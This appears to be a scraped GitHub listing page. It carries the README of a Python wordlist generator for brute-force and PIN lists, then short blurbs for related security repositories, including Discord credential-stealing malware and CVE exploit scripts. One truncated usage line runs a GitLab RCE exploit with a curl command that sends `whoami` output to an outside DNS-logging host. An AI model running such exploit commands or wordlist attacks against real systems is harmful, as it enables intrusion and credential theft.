A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

Overview

Codex - Wordlist Generator

Please let me know what you think! https://github.com/Codex-Major/Wordlist-Generator/discussions

Install:

git clone http://www.github.com/codex-Major/Wordlist-Generator
cd Wordlist-Generator
python3 codex.py

New things

  1. You may now supply more than three wordtypes for concatenation.
  2. Full CLI Usage.

Common usage:

python3 codex.py -c colors.txt -t color -r -of modifiedColors.txt

python3 codex.py -w formnumber4 -of pins.txt -rng 1000

python3 codex.py -a /usr/share/wordlists/dirb/common.txt -t web --confirm
  (One of my favorites.)

The CONF.json file

Inside your CONF.json file are three things... verbose, prettify_json, and symbols.

Verbose - If "True", adds verbosity to the program. If "False", disables alot of the chatter.
Prettify - If "True", allows for much easier navigation and reading of your DICTIONARY.json.
Symbols - *WIP

Commands:

(-h)elp | Gives this output.

    (-w)rite | Writes a new File with the specified wordtypes.
        
        [?] If no path is given, the new text file is created in the same
             directory that this script resides in.
          
            E.g.: 
                -w /path/to/any/dir/newFilename.rtf color:animal:formnumber3
                -w /wordlists/newFilename.txt color:noun:formnumber3
                -w newFilename.txt verb:noun:number

        [?] It is no longer necessary that you supply any : for one type.
            
            E.g.: [*] These all write the same thing
                -w newFilename.txt number
                -w newFilename.txt :number:
                -w newFilename.txt ::number

-a verbs.txt verbs -a nouns.txt nouns ">
    (-a)dd | Adds words from a specified file to the script's wordlists.
        
        [!] Files must have each line contain a single word.
        [!] If a word has " or \\ in it, this script will try to remove it.
            
            Acceptable:
                        word1
                        word2
                        word3
                        word4
                        word5

            Unacceptable:
                        "word1"
                        \word

        [!] Add can only add from one file at a time.

            E.g.: -a /path/to/wordlist/Words.txt 
   
    
                -a verbs.txt verbs
                -a nouns.txt nouns

   

    (-c)heck | Checks a file for existing words and words with symbols in them.

        [!] Acceptable wordlists contain a single word in each line with no symbols.
            [?] Unacceptable Symbols: \ and "

    [*] Args:| {this will change as more lists are added to DICTIONARY.json} |

        [*] color - I.e. ["red", "yellow", "blue"]

        [*] adjective - I.e. ["small", "shiny", "pretty"]

        [*] animal - I.e. ["cat", "dog", "fish"]

        [*] noun - I.e ["banana", "race", "car"]

        [*] verb - I.e. ["jump", "run", "swim"]
            [*] "ing" is added to the end of most verbs

        [*] number - I.e. [""]

        [*] formnumber2 - I.e. [00, 01, 02, 03]

        [*] formnumber3 - I.e. [000, 001, 002, 003]
        
        [*] formnumber4 - I.e. [0000, 0001, 0002, 0003]
        (and so on... 9 max.)

    [?] E.g.:\n 
        [?] color:animal:formnumber3  - #1,646,352 words.
            [*]Writes things like: redshark001 or greentiger999.

        [?] noun:noun:formnumber2  - #22,498,789 words.
            [*]Writes things like: roomservice02 or waterdamage999.

        [?] adj:noun:number  - #256,383,360 words.
            [*]Writes things like: poisonapple2 or ancientpalace123.

        [?] :number: will write one decimal: 1 ;

        [?] :formnumber2: - will write two decimals: 01 ;

        [?] :formnumber4: - #9999 integers.
            [*] Writes four-digit pins.

        [?] :formnumber9: - will write nine decimals: 000000001

Owner
Codex
Just a lonely cyber-ninja.
Codex
Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.

Vital What is Vital? Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (

HellSec 59 Dec 01, 2022
User-friendly reference finder in IDA

IDARefHunter Updated: This project's been introduced on IDA Plugin Contest 2021! Why do we need RefHunter? Getting reference information in one specif

Jiwon 29 Dec 04, 2022
ClusterFuzz is a scalable fuzzing infrastructure that finds security and stability issues in software.

ClusterFuzz ClusterFuzz is a scalable fuzzing infrastructure that finds security and stability issues in software. Google uses ClusterFuzz to fuzz all

Google 4.9k Jan 08, 2023
A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

master_librarian A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities. To install requirements: $ sudo pyth

CoolerVoid 167 Dec 19, 2022
Sonoff NSPanel protocol and hacking information. Tasmota Berry driver for NSPanel

NSPanel Hacking Sonoff NSPanel protocol and hacking information and Tasmota Berry driver. NSPanel protocol manual Tasmota driver nspanel.be Installati

blakadder 98 Dec 26, 2022
High level cheatsheet that was designed to make checks on the OSCP more manageable

High level cheatsheet that was designed to make checks on the OSCP more manageable. This repository however could also be used for your own studying or for evaluating test systems like on HackTheBox

Jacob Scheetz 89 Jan 01, 2023
(D)arth (S)ide of the (L)og4j (F)orce, the ultimate log4j vulnerabilities assessor

DSLF DSLF stands for (D)arth (S)ide of the (L)og4j (F)orce. It is the ultimate log4j vulnerabilities assessor. It comes with four individual Python3 m

frontal 1 Jan 11, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

Dasith Vidanage 7 Mar 08, 2022
This repository consists of the python scripts for execution and automation of vivid tasks.

Scripting.py is a repository being maintained to keep log of the python scripts that I create for automating and executing some of my boring manual task.

Prakriti Regmi 1 Feb 07, 2022
AIL LeakFeeder: A Module for AIL Framework that automate the process to feed leaked files automatically to AIL

AIL LeakFeeder: A Module for AIL Framework that automates the process to feed leaked files automatically to AIL, So basically this feeder will help you ingest AIL with your leaked files automatically

ail project 8 May 03, 2022
PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)

PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager) This script allows to check and exploit missing authentication checks in

chipik 82 Nov 09, 2022
A blind SQL injection script that uses binary search aka bisection method to dump datas from database.

Blind SQL Injection I wrote this script to solve PortSwigger Web Security Academy's particular Blind SQL injection with conditional responses lab. Bec

Şefik Efe 2 Oct 29, 2022
信息收集自动化工具

水泽-信息收集自动化工具 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 0x01 介绍 作者:Ske 团队:0x727,未来一段时间将陆续开源工具,地址:https://github.com/0x727 定位:协助

0x727 2.7k Jan 09, 2023
Polkit - Local Privilege Escalation (CVE-2021-3560)

CVE-2021-3560 Polkit - Local Privilege Escalation Original discovery by kevin_backhouse from GitHub Security Lab References https://github.blog/2021-0

Salman Asad 1 Nov 12, 2021
Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Internationalized Domain Names in Applications (IDNA) Support for the Internationalised Domain Names in Applications (IDNA) protocol as specified in R

Kim Davies 204 Dec 13, 2022
A simple python-function, to gain all wlan passwords from stored wlan-profiles on a computer.

Wlan Fetcher Windows10 Description A simple python-function, to gain all wlan passwords from stored wlan-profiles on a computer. Usage This Script onl

2 Nov 20, 2021
Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

js-on 17 Dec 11, 2022
Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

🏆 Pancakeswap BSC Sniper Bot web3 with honeypot detector (ANDROID WINDOWS MAC LINUX) 🥇 ⭐️ ⭐️ ⭐️ First SNIPER BOT for ANDROID & WINDOWS with honeypot

Mayank 12 Jan 07, 2023
IDA Frida Plugin for tracing something interesting.

IDAFrida A simple IDA plugin to generate FRIDA script. Edit template for functions or you can use the default template. Select functions you want to t

PandaOS 133 Dec 24, 2022